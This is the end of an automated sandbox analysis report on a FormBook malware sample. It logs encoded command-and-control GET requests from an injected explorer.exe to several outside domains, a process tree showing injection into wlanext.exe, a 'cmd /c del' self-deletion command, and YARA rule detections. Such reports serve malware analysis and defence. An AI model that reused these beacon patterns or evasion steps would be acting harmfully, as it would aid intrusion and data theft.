                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        7192.168.2.44976591.195.240.9480C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:32.039463043 CEST6691OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1
                                                                        Host: www.dottproject.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:32.075167894 CEST6692INHTTP/1.1 301 Moved Permanently
                                                                        content-type: text/html; charset=utf-8
                                                                        location: https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4
                                                                        date: Thu, 08 Apr 2021 08:49:32 GMT
                                                                        content-length: 170
                                                                        connection: close
                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 74 74 70 72 6f 6a 65 63 74 2e 63 6f 6d 2f 61 71 75 32 2f 3f 45 68 55 74 76 78 3d 78 64 46 74 33 78 41 48 6e 58 69 54 50 4c 33 70 26 61 6d 70 3b 6d 62 79 44 3d 38 71 50 77 65 47 30 4f 6d 37 67 6e 66 78 63 74 4b 39 38 46 2f 30 64 73 6f 4c 30 6c 76 5a 75 48 34 64 30 7a 4a 2f 41 4b 6d 52 50 4d 46 35 4b 50 68 41 44 78 5a 41 6c 43 71 6d 6a 6d 6d 4b 50 35 2f 41 4f 34 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                        Data Ascii: <a href="https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&amp;mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4">Moved Permanently</a>.


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        8192.168.2.449767104.128.125.9580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:37.615808010 CEST6736OUTGET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.qcmax.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:38.058896065 CEST6736OUTGET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.qcmax.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:38.221250057 CEST6738INHTTP/1.1 200 OK
                                                                        Server: Tengine
                                                                        Date: Thu, 08 Apr 2021 08:49:38 GMT
                                                                        Content-Type: text/html;charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        9192.168.2.44976834.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:43.196348906 CEST6739OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1
                                                                        Host: www.playfulpainters.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:43.311574936 CEST6739INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 08:49:43 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "605e0138-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        Analysis Process: eQLPRPErea.exe PID: 6876 Parent PID: 5760

                                                                        General

                                                                        Start time:10:48:04
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206065 bytes
                                                                        MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: eQLPRPErea.exe PID: 6956 Parent PID: 6876

                                                                        General

                                                                        Start time:10:48:05
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206065 bytes
                                                                        MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6956

                                                                        General

                                                                        Start time:10:48:10
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: wlanext.exe PID: 4832 Parent PID: 3424

                                                                        General

                                                                        Start time:10:48:22
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                        Imagebase:0xea0000
                                                                        File size:78848 bytes
                                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        Analysis Process: cmd.exe PID: 6616 Parent PID: 4832

                                                                        General

                                                                        Start time:10:48:26
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Analysis Process: conhost.exe PID: 6648 Parent PID: 6616

                                                                        General

                                                                        Start time:10:48:26
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis

                                                                        Reset < >